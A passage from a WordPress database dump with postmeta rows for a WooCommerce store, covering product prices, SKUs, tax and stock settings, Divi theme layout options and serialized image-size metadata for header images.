id=\"4\" /]'),(4849,28066,'_edit_lock','1499074933:3'),(4850,28066,'_edit_last','3'),(4851,28066,'_wp_page_template','default'),(4852,28066,'_et_pb_post_hide_nav','default'),(4853,28066,'_et_pb_page_layout','et_right_sidebar'),(4854,28066,'_et_pb_side_nav','off'),(4855,28066,'_et_pb_use_builder','on'),(4857,28066,'_et_pb_ab_stats_refresh_interval','hourly'),(4858,28066,'_et_pb_old_content','[product_category category=\"tax-registrations\"]'),(4859,28066,'_et_pb_enable_shortcode_tracking',''),(4860,28066,'_et_pb_custom_css',''),(4953,64,'_tax_status','taxable'),(4954,64,'_tax_class',''),(4955,64,'_default_attributes','a:0:{}'),(4956,64,'_download_limit','-1'),(4957,64,'_download_expiry','-1'),(4958,64,'_et_pb_post_hide_nav','default'),(4959,64,'_et_pb_page_layout','et_right_sidebar'),(4960,64,'_et_pb_side_nav','off'),(4962,144,'_et_post_bg_color','#ffffff'),(4963,144,'_et_post_bg_layout','light'),(4964,144,'_et_pb_show_title','on'),(4965,144,'_et_pb_post_hide_nav','default'),(4966,144,'_et_pb_page_layout','et_right_sidebar'),(4967,144,'_et_pb_side_nav','off'),(4968,144,'_et_pb_use_builder',''),(4970,144,'_et_pb_ab_stats_refresh_interval','hourly'),(4971,144,'_et_pb_old_content',''),(4972,144,'_et_pb_enable_shortcode_tracking',''),(4973,144,'_et_pb_custom_css',''),(4978,237,'_tax_status','taxable'),(4979,237,'_tax_class',''),(4980,237,'_default_attributes','a:0:{}'),(4981,237,'_download_limit','-1'),(4982,237,'_download_expiry','-1'),(4983,237,'_et_pb_post_hide_nav','default'),(4984,237,'_et_pb_page_layout','et_right_sidebar'),(4985,237,'_et_pb_side_nav','off'),(5303,70,'_tax_status','taxable'),(5304,70,'_tax_class',''),(5305,70,'_default_attributes','a:0:{}'),(5306,70,'_download_limit','-1'),(5307,70,'_download_expiry','-1'),(5308,70,'_et_pb_post_hide_nav','default'),(5309,70,'_et_pb_page_layout','et_right_sidebar'),(5310,70,'_et_pb_side_nav','off'),(5311,72,'_tax_status','taxable'),(5312,72,'_tax_class',''),(5313,72,'_default_attributes','a:0:{}'),(5314,72,'_download_limit','-1'),(5315,72,'_download_expiry','-1'),(5316,72,'_et_pb_post_hide_nav','default'),(5317,72,'_et_pb_page_layout','et_right_sidebar'),(5318,72,'_et_pb_side_nav','off'),(5319,74,'_tax_status','taxable'),(5320,74,'_tax_class',''),(5321,74,'_default_attributes','a:0:{}'),(5322,74,'_download_limit','-1'),(5323,74,'_download_expiry','-1'),(5324,74,'_et_pb_post_hide_nav','default'),(5325,74,'_et_pb_page_layout','et_right_sidebar'),(5326,74,'_et_pb_side_nav','off'),(5327,69,'_tax_status','taxable'),(5328,69,'_tax_class',''),(5329,69,'_default_attributes','a:0:{}'),(5330,69,'_download_limit','-1'),(5331,69,'_download_expiry','-1'),(5332,69,'_et_pb_post_hide_nav','default'),(5333,69,'_et_pb_page_layout','et_right_sidebar'),(5334,69,'_et_pb_side_nav','off'),(5335,68,'_tax_status','taxable'),(5336,68,'_tax_class',''),(5337,68,'_default_attributes','a:0:{}'),(5338,68,'_download_limit','-1'),(5339,68,'_download_expiry','-1'),(5340,68,'_et_pb_post_hide_nav','default'),(5341,68,'_et_pb_page_layout','et_right_sidebar'),(5342,68,'_et_pb_side_nav','off'),(5343,67,'_tax_status','taxable'),(5344,67,'_tax_class',''),(5345,67,'_default_attributes','a:0:{}'),(5346,67,'_download_limit','-1'),(5347,67,'_download_expiry','-1'),(5348,67,'_et_pb_post_hide_nav','default'),(5349,67,'_et_pb_page_layout','et_right_sidebar'),(5350,67,'_et_pb_side_nav','off'),(5351,65,'_tax_status','taxable'),(5352,65,'_tax_class',''),(5353,65,'_default_attributes','a:0:{}'),(5354,65,'_download_limit','-1'),(5355,65,'_download_expiry','-1'),(5356,65,'_et_pb_post_hide_nav','default'),(5357,65,'_et_pb_page_layout','et_right_sidebar'),(5358,65,'_et_pb_side_nav','off'),(5359,79,'_tax_status','taxable'),(5360,79,'_tax_class',''),(5361,79,'_default_attributes','a:0:{}'),(5362,79,'_download_limit','-1'),(5363,79,'_download_expiry','-1'),(5364,79,'_et_pb_post_hide_nav','default'),(5365,79,'_et_pb_page_layout','et_right_sidebar'),(5366,79,'_et_pb_side_nav','off'),(5367,80,'_tax_status','taxable'),(5368,80,'_tax_class',''),(5369,80,'_default_attributes','a:0:{}'),(5370,80,'_et_pb_post_hide_nav','default'),(5371,80,'_et_pb_page_layout','et_right_sidebar'),(5372,80,'_et_pb_side_nav','off'),(5373,62,'_tax_status','taxable'),(5374,62,'_tax_class',''),(5375,62,'_default_attributes','a:0:{}'),(5376,62,'_download_limit','-1'),(5377,62,'_download_expiry','-1'),(5378,62,'_et_pb_post_hide_nav','default'),(5379,62,'_et_pb_page_layout','et_right_sidebar'),(5380,62,'_et_pb_side_nav','off'),(5381,78,'_tax_status','taxable'),(5382,78,'_tax_class',''),(5383,78,'_default_attributes','a:0:{}'),(5384,78,'_download_limit','-1'),(5385,78,'_download_expiry','-1'),(5386,78,'_et_pb_post_hide_nav','default'),(5387,78,'_et_pb_page_layout','et_right_sidebar'),(5388,78,'_et_pb_side_nav','off'),(5389,77,'_tax_status','taxable'),(5390,77,'_tax_class',''),(5391,77,'_default_attributes','a:0:{}'),(5392,77,'_download_limit','-1'),(5393,77,'_download_expiry','-1'),(5394,77,'_et_pb_post_hide_nav','default'),(5395,77,'_et_pb_page_layout','et_right_sidebar'),(5396,77,'_et_pb_side_nav','off'),(5397,76,'_tax_status','taxable'),(5398,76,'_tax_class',''),(5399,76,'_default_attributes','a:0:{}'),(5400,76,'_download_limit','-1'),(5401,76,'_download_expiry','-1'),(5402,76,'_et_pb_post_hide_nav','default'),(5403,76,'_et_pb_page_layout','et_right_sidebar'),(5404,76,'_et_pb_side_nav','off'),(5405,75,'_tax_status','taxable'),(5406,75,'_tax_class',''),(5407,75,'_default_attributes','a:0:{}'),(5408,75,'_download_limit','-1'),(5409,75,'_download_expiry','-1'),(5410,75,'_et_pb_post_hide_nav','default'),(5411,75,'_et_pb_page_layout','et_right_sidebar'),(5412,75,'_et_pb_side_nav','off'),(5413,28088,'_wc_review_count','0'),(5414,28088,'_wc_rating_count','a:0:{}'),(5415,28088,'_wc_average_rating','0'),(5416,28088,'_edit_lock','1510658082:3'),(5417,28088,'_edit_last','3'),(5419,28088,'_sku','COMB001'),(5420,28088,'_regular_price','1399'),(5421,28088,'_sale_price','999'),(5422,28088,'_sale_price_dates_from',''),(5423,28088,'_sale_price_dates_to',''),(5424,28088,'total_sales','3'),(5425,28088,'_tax_status','taxable'),(5426,28088,'_tax_class',''),(5427,28088,'_manage_stock','no'),(5428,28088,'_backorders','no'),(5429,28088,'_sold_individually','yes'),(5430,28088,'_weight',''),(5431,28088,'_length',''),(5432,28088,'_width',''),(5433,28088,'_height',''),(5434,28088,'_upsell_ids','a:0:{}'),(5435,28088,'_crosssell_ids','a:0:{}'),(5436,28088,'_purchase_note',''),(5437,28088,'_default_attributes','a:0:{}'),(5438,28088,'_virtual','no'),(5439,28088,'_downloadable','no'),(5440,28088,'_product_image_gallery',''),(5441,28088,'_download_limit','-1'),(5442,28088,'_download_expiry','-1'),(5443,28088,'_stock',NULL),(5444,28088,'_stock_status','instock'),(5445,28088,'_product_version','3.2.3'),(5446,28088,'_price','999'),(5447,28088,'_et_pb_post_hide_nav','default'),(5448,28088,'_et_pb_page_layout','et_right_sidebar'),(5449,28088,'_et_pb_side_nav','off'),(5455,28090,'_wc_review_count','0'),(5456,28090,'_wc_rating_count','a:0:{}'),(5457,28090,'_wc_average_rating','0'),(5458,28090,'_edit_lock','1526394578:1'),(5459,28090,'_edit_last','3'),(5461,28090,'_sku','COMB002'),(5462,28090,'_regular_price','2199'),(5463,28090,'_sale_price','1699'),(5464,28090,'_sale_price_dates_from',''),(5465,28090,'_sale_price_dates_to',''),(5466,28090,'total_sales','3'),(5467,28090,'_tax_status','taxable'),(5468,28090,'_tax_class',''),(5469,28090,'_manage_stock','no'),(5470,28090,'_backorders','no'),(5471,28090,'_sold_individually','yes'),(5472,28090,'_weight',''),(5473,28090,'_length',''),(5474,28090,'_width',''),(5475,28090,'_height',''),(5476,28090,'_upsell_ids','a:0:{}'),(5477,28090,'_crosssell_ids','a:0:{}'),(5478,28090,'_purchase_note',''),(5479,28090,'_default_attributes','a:0:{}'),(5480,28090,'_virtual','no'),(5481,28090,'_downloadable','no'),(5482,28090,'_product_image_gallery',''),(5483,28090,'_download_limit','-1'),(5484,28090,'_download_expiry','-1'),(5485,28090,'_stock',NULL),(5486,28090,'_stock_status','instock'),(5487,28090,'_product_version','3.2.3'),(5488,28090,'_price','1699'),(5489,28090,'_et_pb_post_hide_nav','default'),(5490,28090,'_et_pb_page_layout','et_right_sidebar'),(5491,28090,'_et_pb_side_nav','off'),(5492,28091,'_wc_review_count','0'),(5493,28091,'_wc_rating_count','a:0:{}'),(5494,28091,'_wc_average_rating','0'),(5495,28091,'_edit_lock','1526796098:1'),(5496,28091,'_edit_last','1'),(5498,28091,'_sku','COMB003'),(5499,28091,'_regular_price','6798'),(5500,28091,'_sale_price','4999'),(5501,28091,'_sale_price_dates_from',''),(5502,28091,'_sale_price_dates_to',''),(5503,28091,'total_sales','3'),(5504,28091,'_tax_status','taxable'),(5505,28091,'_tax_class',''),(5506,28091,'_manage_stock','no'),(5507,28091,'_backorders','no'),(5508,28091,'_sold_individually','yes'),(5509,28091,'_weight',''),(5510,28091,'_length',''),(5511,28091,'_width',''),(5512,28091,'_height',''),(5513,28091,'_upsell_ids','a:0:{}'),(5514,28091,'_crosssell_ids','a:0:{}'),(5515,28091,'_purchase_note',''),(5516,28091,'_default_attributes','a:0:{}'),(5517,28091,'_virtual','no'),(5518,28091,'_downloadable','no'),(5519,28091,'_product_image_gallery',''),(5520,28091,'_download_limit','-1'),(5521,28091,'_download_expiry','-1'),(5522,28091,'_stock',NULL),(5523,28091,'_stock_status','instock'),(5524,28091,'_product_version','3.3.5'),(5525,28091,'_price','4999'),(5526,28091,'_et_pb_post_hide_nav','default'),(5527,28091,'_et_pb_page_layout','et_right_sidebar'),(5528,28091,'_et_pb_side_nav','off'),(5529,28092,'_wc_review_count','0'),(5530,28092,'_wc_rating_count','a:0:{}'),(5531,28092,'_wc_average_rating','0'),(5532,28092,'_edit_lock','1510658260:3'),(5533,28092,'_edit_last','3'),(5535,28092,'_sku','COMB004'),(5536,28092,'_regular_price','8298'),(5537,28092,'_sale_price','5999'),(5538,28092,'_sale_price_dates_from',''),(5539,28092,'_sale_price_dates_to',''),(5540,28092,'total_sales','3'),(5541,28092,'_tax_status','taxable'),(5542,28092,'_tax_class',''),(5543,28092,'_manage_stock','no'),(5544,28092,'_backorders','no'),(5545,28092,'_sold_individually','yes'),(5546,28092,'_weight',''),(5547,28092,'_length',''),(5548,28092,'_width',''),(5549,28092,'_height',''),(5550,28092,'_upsell_ids','a:0:{}'),(5551,28092,'_crosssell_ids','a:0:{}'),(5552,28092,'_purchase_note',''),(5553,28092,'_default_attributes','a:0:{}'),(5554,28092,'_virtual','no'),(5555,28092,'_downloadable','no'),(5556,28092,'_product_image_gallery',''),(5557,28092,'_download_limit','-1'),(5558,28092,'_download_expiry','-1'),(5559,28092,'_stock',NULL),(5560,28092,'_stock_status','instock'),(5561,28092,'_product_version','3.2.3'),(5562,28092,'_price','5999'),(5563,28092,'_et_pb_post_hide_nav','default'),(5564,28092,'_et_pb_page_layout','et_right_sidebar'),(5565,28092,'_et_pb_side_nav','off'),(5573,28098,'_wp_attached_file','2017/06/14-1403-Company-Web-Header_2.jpg'),(5574,28098,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:500;s:4:\"file\";s:40:\"2017/06/14-1403-Company-Web-Header_2.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-510x182.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-300x107.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-768x274.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"14-1403-Company-Web-Header_2-1024x366.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-510x182.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-610x218.jpg\";s:5:\"width\";i:610;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:41:\"14-1403-Company-Web-Header_2-1080x500.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:41:\"14-1403-Company-Web-Header_2-1080x386.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:40:\"14-1403-Company-Web-Header_2-400x500.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5575,28099,'_wp_attached_file','2017/06/121120.jpg'),(5576,28099,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:645;s:4:\"file\";s:18:\"2017/06/121120.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"121120-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"121120-510x206.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"121120-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"121120-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"121120-300x121.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:121;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"121120-768x310.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:310;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"121120-1024x413.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:413;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"121120-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"121120-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"121120-510x206.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:18:\"121120-610x246.jpg\";s:5:\"width\";i:610;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:18:\"121120-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:19:\"121120-1080x645.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:18:\"121120-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:18:\"121120-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:19:\"121120-1080x435.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:435;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:18:\"121120-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5577,28100,'_wp_attached_file','2017/06/bg-header-team1.jpg'),(5578,28100,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:939;s:6:\"height\";i:198;s:4:\"file\";s:27:\"2017/06/bg-header-team1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"bg-header-team1-400x198.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-510x108.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"bg-header-team1-300x63.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-768x162.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"bg-header-team1-400x198.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-510x108.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-610x129.jpg\";s:5:\"width\";i:610;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-400x198.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-400x198.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-510x198.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:27:\"bg-header-team1-400x198.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5579,28101,'_wp_attached_file','2017/06/company-header.jpg'),(5580,28101,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:200;s:4:\"file\";s:26:\"2017/06/company-header.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"company-header-400x200.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"company-header-510x102.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"company-header-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"company-header-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"company-header-300x60.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"company-header-768x154.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"company-header-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"company-header-400x200.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"company-header-510x102.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:26:\"company-header-610x122.jpg\";s:5:\"width\";i:610;s:6:\"height\";i:122;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:26:\"company-header-400x200.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:26:\"company-header-400x200.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:26:\"company-header-510x200.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:26:\"company-header-400x200.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5581,28102,'_wp_attached_file','2017/06/company-header-careers.jpg'),(5582,28102,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:220;s:4:\"file\";s:34:\"2017/06/company-header-careers.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"company-header-careers-400x220.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"company-header-careers-510x112.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"company-header-careers-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"company-header-careers-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"company-header-careers-300x66.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"company-header-careers-768x169.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"company-header-careers-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s: